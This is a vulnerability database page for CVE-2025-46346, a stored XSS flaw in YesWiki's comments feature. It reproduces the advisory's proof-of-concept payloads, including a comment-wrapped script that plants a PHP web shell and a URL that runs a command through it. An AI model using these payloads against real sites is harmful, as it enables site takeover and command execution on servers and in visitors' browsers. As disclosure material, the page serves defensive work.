6.3

CVSS Score

4.0

-

CVSS Score

Basic Information

CVE ID

CVE-2025-46346

GHSA ID

GHSA-59x8-cvxh-3mm4

EPSS Score

0.15354%

CWE

CWE-79

Published

4/29/2025

Updated

4/29/2025

KEV Status

Technology

PHP

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-46346

CVE-2025-46346: YesWiki Stored XSS Vulnerability in Comments

Summary

A stored cross-site scripting (XSS) vulnerability was discovered in the application’s comments feature. This issue allows a malicious actor to inject JavaScript payloads that are stored and later executed in the browser of any user viewing the affected comment.

The XSS occurs because the application fails to properly sanitize or encode user input submitted to the comments. Notably, the application sanitizes or does not allow execution of <script> tags, but does not account for payloads obfuscated using JavaScript block comments like /* JavaScriptPayload */.

PoC

Navigate to a site and page that allows comments and place this in the comments section and submit it:

/*<script>alert('pizzapower')</script>*/

Upon submitting to the page, it will run. And then upon every page visit, it will run.

Impact

An attacker can run arbitrary JS in the victim's browser (any user that visits the page with the comments). This can be chained to do many malicious actions, such as to achieve RCE when chained with another vulnerability, e.g.:

/*<script>fetch("/?api/templates/custom-presets/anhtyjik.php",{method:"POST",headers:{"Content-Type":"application/x-www-form-urlencoded"},body:"primary-color=%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&secondary-color-1=%23d8604c&secondary-color-2=%23d78958&neutral-color=%234e5056&neutral-soft-color=%2357575c&neutral-light-color=%23f2f2f2&main-text-fontsize=17px&main-text-fontfamily=%22Nunito%22%2C+sans-serif&main-title-fontfamily='Nunito'%2C+sans-serif"});</script>*/

Then you can visit http://localhost:8085/custom/css-presets/anhtyjik.php?cmd=id and see the output of the ID command.

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2025-46346

CVE-2025-46346:

6.3

CVSS Score

4.0

-

CVSS Score

Basic Information

CVE ID

CVE-2025-46346

GHSA ID

GHSA-59x8-cvxh-3mm4

EPSS Score

0.15354%

CWE

CWE-79

Published

4/29/2025

Updated

4/29/2025

KEV Status

Technology

PHP

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:N/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
yeswiki/yeswiki	composer	<= 4.5.3	4.5.4

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability (GHSA-59x8-cvxh-3mm4) is a stored XSS in the comments feature of YesWiki, caused by improper sanitization of JavaScript block comments (/* ... */). The provided commit (0d4efc880a727599fa4f6d7a64cc967afe475530) is listed as the patch for this vulnerability. While the direct changes in this commit are related to ACL configurations for various API endpoints (including those for comments), the functions ApiController::postComment and ApiController::editComment are identified as vulnerable. These functions are the primary entry points for creating and updating comments, respectively. As per the vulnerability description, they process user-supplied comment data that is not adequately sanitized, allowing malicious JavaScript payloads (obfuscated with block comments) to be stored and later executed in users' browsers. The modifications to these functions in the security-related commit, even if for ACLs, confirm their role in the comment handling system that contains the XSS flaw. The vulnerability lies in the system's failure to sanitize the data these functions handle, making them processors of potentially malicious input.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

6.3

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2025-46346: YesWiki Stored XSS Vulnerability in Comments

Summary

PoC

Impact

CVE-2025-46346:

6.3

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

6.3

6.3

Technical Details

CVE-2025-46346: YesWiki Stored XSS Vulnerability in Comments

Summary

PoC

Impact

Basic Information

Basic Information

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI